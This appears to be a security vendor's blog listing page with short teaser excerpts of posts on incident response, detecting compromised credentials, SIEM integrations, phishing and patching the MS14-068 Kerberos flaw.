Who you gonna call? How to work effectively with Incident Response teams and processes - A Tweetchat (#DFIRchat) No matter if have a semi-formalized process, an internal Incident Response team, or rely on an external partner, when there's a potential crisis on the horizon, there are many questions you need to answer, all while under immense pressure to act — and act quickly. We wanted to explore what Incident Response professionals see as some strategic pitfalls to avoid when investigating inci

2 min Authentication

Top 3 Takeaways from the "Planning for Failure: How to Succeed at Detecting Intruders on your Network" Webcast

Last week, Rick Holland, Principal Analyst at Forrester Research joined Christian Kirsch [/author/christian-kirsch] to discuss the concept of planning for failure in your security programs by being equipped to detect and investigate effectively when intruders get past your defenses. Read on to learn the top takeaways from their discussion on “Planning for Failure: How to Succeed at Detecting Intruders on your Network [

1 min Events

How to Make the UNITED Security Summit Your Own

At Rapid7's 2015 UNITED Security Summit [] you can customize your experience beyond general keynotes and expert panels to gain the insight and confidence you need to build, improve, and maintain strong security programs at your organization. Join us at The Seaport Boston Hotel & World Trade Center on June 17-18th and you will earn 16 CPE credits and have the chance to: * Choose sessions from 3 breakout

4 min Incident Response

Preparing for Incident Response

Today, we launched a short Whiteboard Wednesday video [] aimed at providing a brief overview of how to effectively prepare for an incident. In this post, I'd like to expand on that a little bit by providing some additional concrete steps on how most organizations should be thinking about how preparedness can directly impact incident response program execution during a breach. The first step is going to involve discovery

4 min Incident Response

Remove Your Alert Triage Bottleneck To Speed Response

Recently, I wrote about the two largest incident response bottlenecks [/2014/12/12/attackers-prey-on-incident-response-bottlenecks] behind the massive gap in time to compromise an organization and time it takes incident response teams to verify the true incident and take appropriate action. I then discussed the second bottleneck of incident analysis [/2015/01/23/remove-your-incident-analysis-bottleneck-to-improve-your-time-to-contain] , and to close the loop, I want to discuss the first bottlene

4 min Incident Response

Remove Your Incident Analysis Bottleneck To Improve Your Time To Contain

Last month, I wrote about the two largest incident response bottlenecks [/2014/12/12/attackers-prey-on-incident-response-bottlenecks] behind the massive gap in time to compromise an organization and time it takes incident response teams to verify the true incident and take appropriate action. This post is meant to go into much greater detail on the second bottleneck: incident analysis (AKA investigation). Challenge #1: Incident analysis with existing security tools can be very frustrating In th

3 min Malware

"Skeleton Key" Exhibits Increased Blending Of Credentials And Malware

Dell SecureWorks published a very informative blog [] this week about a new type of malware they have appropriately labeled “Skeleton Key”. Our community manager quickly wrote a note of appreciation for setting a great example through disclosure and a quick mitigation strategy [/2015/01/14/effective-information-sharing-exposing-skeleton-key?] that every security professional should

4 min Authentication

Patch CVE-2014-6324 To Avoid A Complete Domain Rebuild When UserInsight Detects Its Exploit

On Tuesday, November 18th, Microsoft released an out-of-band security patch affecting any Windows domain controllers that are not running in Azure. I have not yet seen any cute graphics or buzzword names for it, so it will likely be known as MS14-068, CVE-2014-6324, or "that Kerberos vulnerability that is being exploited in the wild to completely take over Windows domains" because it rolls off the tongue a little better. There is a very informative description of the vulnerability, impact, and

2 min Networking

Securing DevOps: Monitoring Development Access to Production Environments

A big factor for securing DevOps environment is that engineers should not have access to the production environment. This is especially true if the production environment contains sensitive data, such as payment card data, protected health information, or personally identifiable information because compromised engineering credentials could expose sensitive data and lead to a breach. While this requirement is a security best practice and has found its way into many compliance regulations, it can

3 min Networking

UserInsight Detects Network Zone Access Violations

Information security regulations are often vague and open to some interpretation, but one common theme across most is that you need to separate the systems with critical data from the rest of your network. The vast majority of employees in your organization should never have access to systems that: * process or store payment card data -- PCI DSS * qualify as Critical Cyber Assets (i.e. have a role in the operation of bulk power systems) -- NERC CIP * provide services not needed for intern

3 min Incident Detection

Detecting Compromised Amazon Web Services (AWS) Accounts

As you move more of your critical assets to Amazon Web Services (AWS), you'll need to ensure that only authorized users have access. Three out of four breaches use compromised credentials, yet many companies struggle to detect their use. UserInsight enables organizations to detect compromised credentials, from the endpoint to the cloud. Through its AWS integration, Rapid7 UserInsight monitors all administrator access to Amazon Web Services, so you can detect compromised credentials before they t

3 min Incident Detection

More Efficient Incident Detection and Investigation Saves $400,000 per Year, Says IDC

IDC just published an infographic on how credentials are abused by cyber criminals. These are interesting and important statistics: * 80% of companies will suffer at least one successful attack causing serious harm that requires remediation * 33% will not be able to prevent over half of the attacks These stats explain why many security experts are advising companies to shift their security spending to detection mechanisms instead of relying too heavily on prevention. Measuring incident c

1 min Incident Response

Top 3 Takeaways from the "When Every Minute Counts: Accelerating Incident Investigations" Webcast

In our latest webcast, we heard from Christian Kirsch [], Principal Product Marketing Manager at Rapid7 on, “When Every Minute Counts: Accelerating Incident Investigations [] ”. In this webcast, Chris spoke about the major challenges incident responders face, and what they can do to tackle these challenges head on and significantly reduce investigation time. Read on to learn t

4 min Incident Response

The Significance of Fast and Organized Tools for Incident Investigations

Incident response processes have become more standardized in the past two decades, but any organization without a dedicated development team has had to design its processes to take available tools into account. I want to talk about incident investigation tools and how they are analogous to those used in the non-"cyber" criminal investigations that we have seen for years on television. There is a point where a security incident investigation gives way to a criminal investigation, due to a crimina

3 min Incident Detection

UserInsight Speeds Investigations with New Interactive Incident Timeline

Rapid7 UserInsight features a new interactive incident timeline, which enables you to quickly understand the context of an incident, determine what happened, and prioritize the appropriate response. With the new capabilities, incident responders can identify indicators of compromise and map a possible attack by correlating events such as authentications, IPS alerts, and vulnerabilities across users, assets and IP addresses. UserInsight is the only user behavior analytics solution [https://www.ra

6 min Incident Detection

Cyber Security Awareness Month: Crisis Response and Communication

Throughout October, Rapid7 has run a series of blog posts designed to help you talk to the C-suite of your organization about security.  We've focused on why executives should pay attention [/2014/10/06/cyber-security-awareness-month-taking-it-to-the-c-level-and-beyond] , what they specifically need to focus on [/2014/10/17/cyber-security-awareness-month-data-custodianship], some ways to improve organizational security [/2014/10/28/cyber-security-awareness-month-why-your-organization-needs-secur

5 min Incident Response

Noise Canceling Security: Extract More Value From IPS/IDS, Firewalls, and Anti-Virus

Based on a common pain and your positive feedback on last month's blog post entitled "Don't Be Noisy" [/2016/05/02/alert-fatigue-incident-response-teams-stop-listening-to-monitoring-solutions/] , we have started significantly expanding the scope of our noise reduction efforts. Rather than reinvent the great technology that intrusion detection/prevention systems (IDS/IPS), firewalls, and anti-virus products offer, we are aiming to provide an understanding of the massive amounts of data produced b

2 min Phishing

Dogfooding at Rapid7: How UserInsight Saved Us from Getting Phished

A lot of companies talk about how they "eat their own dogfood." For those of you unfamiliar with the colloquialism, it means that they use their own products to validate both value and quality. This is a much easier thing to do in high technology than at, well, a dog food manufacturer. I feel that I may have breezed over the fact when I mentioned in a previous UserInsight blog that we test out the noise of an alert by enabling it at Rapid7 (among other ways) before pushing it to our customer bas

2 min Incident Detection

UserInsight Integrates with LogRhythm SIEM to Accelerate Incident Detection and Response

Rapid7 UserInsight finds the attacks you're missing by detecting and investigating indications of compromised users from the endpoint to the cloud. UserInsight [] now integrates with LogRhythm, a leading Gartner-rated SIEMs in the industry. If you have already integrated all of your data sources with LogRhythm, you can now configure UserInsight to consume its data through LogRhythm, significantly simplifying your UserInsight deployment. UserInsight

2 min Authentication

Protect Your Service Accounts: Detecting Service Accounts Authenticating from a New Host

IT professionals set up service accounts to enable automated processes, such as backup services and network scans. In UserInsight, we can give you quick visibility into service accounts by detecting which accounts do not have password expiration enabled. Many UserInsight subscribers love this simple feature, which is available the instant they have integrated their LDAP directory with UserInsight. In addition, UserInsight has several new ways to detect compromised service accounts. To do their

2 min SIEM

Get HP ArcSight Alerts on Compromised Credentials, Phishing Attacks and Suspicious Behavior

If you're using HP ArcSight ESM as your SIEM, you can now add user-based incident detection and response to your bag of tricks. Rapid7 is releasing a new integration between Rapid7 UserInsight [] and HP ArcSight ESM [] , which enables you to detect, investigate and respond to security threats targeting a company's users more quickly and effectively. HP ArcSight is

2 min Metasploit

Detecting the Use of Stolen Passwords

Rarely in life will software vendors let you in on some of their secret sauce. Rapid7 obviously believes in information sharing and the open source community, so in that same vein, the UserInsight team decided to write a guide to gathering the right data to fully understand how stolen passwords are being (mis)used in your organization. The result is a Technical Paper [] called "Why You Need to Detect More Than

2 min Authentication

Top 2 Takeaways from the "Incident Response: Why You Need to Detect More Than Pass the Hash" Webcast

This week's webcast featured Matt Hathaway, Senior Manager of Platform Products at Rapid7, and Jeff Myers, Lead Software Engineer for UserInsight at Rapid7, as they spoke on, “Incident Response: Why You Need to Detect More Than Pass the Hash [] ”. This technical webinar emphasized how compromised credentials are a key predatory weapon in the attacker's arsenal, and featured an in-depth discussion of indicators of compro

3 min Authentication

Find the Shared Credentials That Make Security Sad

No matter what risk framework or security standards you hold most dear, I know for sure that you consider users sharing accounts to be a violation of the common sense that is the necessary foundation of any security awareness training. When the UserInsight team set out to identify evasive attacker behaviors like "account impersonation" and "local credential testing" (that I covered in a blog you can read here [/2014/08/19/lateral-movement-not-just-for-t3h-1337-h4x02]), one of the most important

2 min Incident Response

Single Pane of Glass Series: FireEye Threat Analytics Platform (TAP)

As UserInsight grows and we look to add value to more incident response teams that have already chosen the solution that serves as their "single pane of glass", this series will update you on the integrations we build to share valuable context with those solutions. The Solution While FireEye and Mandiant were separately disrupting the security industry, they obtained a great deal of threat intelligence and indicators of compromise along the way. The FireEye Threat Analytics Platform (TAP for sh

4 min Incident Response

Involve Us to Spend More Time Investigating Incidents

There is a discussion on the active feedback loop that all software vendors need to have with their customers. When we are showing a demo of UserInsight to incident response teams, I commonly hear a skeptical question: "Our environment is unlike any other I have seen. How much of the feature set that you show here can we expect to get?" Here's the thing: Every organization's network is unique. It's this complexity and uniqueness that makes securing an organization so incredibly difficult and al

2 min Honeypots

Like Playing with Honeypots? Stop Playing, Start Using

Honeypots are machines whose only purpose is to entrap attackers who scan or even hack into them. Honeypots are very powerful for detecting incidents because every interaction with them is illegitimate by definition: honeypots do not host legitimate data or services, so there is no reason for a regular user to interact with them. However, honeypots come with one major drawback: a great deal of security professionals have told me that they built a honeypot, played around with it, and eventually

1 min Incident Detection

Come Crash My Party! Your Invitation to Our Summer Series

Hey everyone, it's Michael Santarcangelo [], the Security Catalyst [] - with an invitation to join me and Rapid7 on a journey over the next few weeks. As the value of the systems and information we protect continues to grow, we face attackers that are more organized, and more disciplined. In fact, when we looked at it, breaking down the concepts and elements necessary to be successful when it comes to handling

1 min Incident Response

Top 3 Takeaways from the "Need for Speed: 5 Tips to Accelerate Incident Investigation Time" Webcast

In a thorough and detailed webcast earlier this week, we heard from michael belton [] and Lital Asher - Dotan [] on the increasingly urgent subject, “Need for Speed: 5 Tips to Accelerate Incident Investigation Time [] ”. Meticulous and successful plans for efficient incident response can make or break an organization after a

2 min Metasploit

Top 4 Takeaways from the "Live Bait: How to Prevent, Detect, and Respond to Phishing Emails" Webcast

In this week's webcast,Lital Asher - Dotan [] and ckirsch [] tackled the hot topic, “Live Bait: How to Prevent, Detect, and Respond to Phishing Emails [] ”. Phishing has risen from #9 to #3 in the Verizon Data Breach Investigations Report on the most common attack vectors. Phishing attacks are often successful because i

5 min Log Management

Incident Response is about Where, When, and How

"If and when" is old and busted. "Where, when, and how" are the new hotness. Incidents happen. There will always be a Patient Zero. "Where the incident happened, when you detect the incident, and how you responded" is what I believe matters. I think the general public will appreciate measured response under attack to us fostering belief in 'perfect defense'. With this in mind, I want discuss a few thoughts prompted by eBay's response to this compromise. Scoping is hard Incident Handlers le

2 min Incident Response

Cyber security around the world - 18/3/14 - UK Cyber Security Strategy

With so much happening in cyber security around the world lately, we're highlighting some of the interesting stories each week from across Europe, Middle East, Africa and Asia Pacific. This week, we're in the UK to look at a key component of the government's Cyber Security Strategy []… United Kingdom Over a year ago, the UK government announced plans for a new national Computer Emergency Response Team (CERT) [

3 min Incident Detection

Finding Out What Users are Doing on Your Network

One of the most common questions in IT is how to find out what users are doing on a network. We break down the common ways to monitor users on your network.

3 min PCI

PCI 30 seconds newsletter #19 - Your PCI Logbook - What is required in terms of log management?

P>D R is a well-known principle in security. It's a principle that means that the Protective measures in place must be strong enough to resist longer than the time required to Detect something wrong is happening and then React. For example, your door must be strong enough to prevent a malicious individual from getting in for at least the amount time required to detect the incident, alert the police, and have them arrive on site. In this context, log management plays a specific role. It help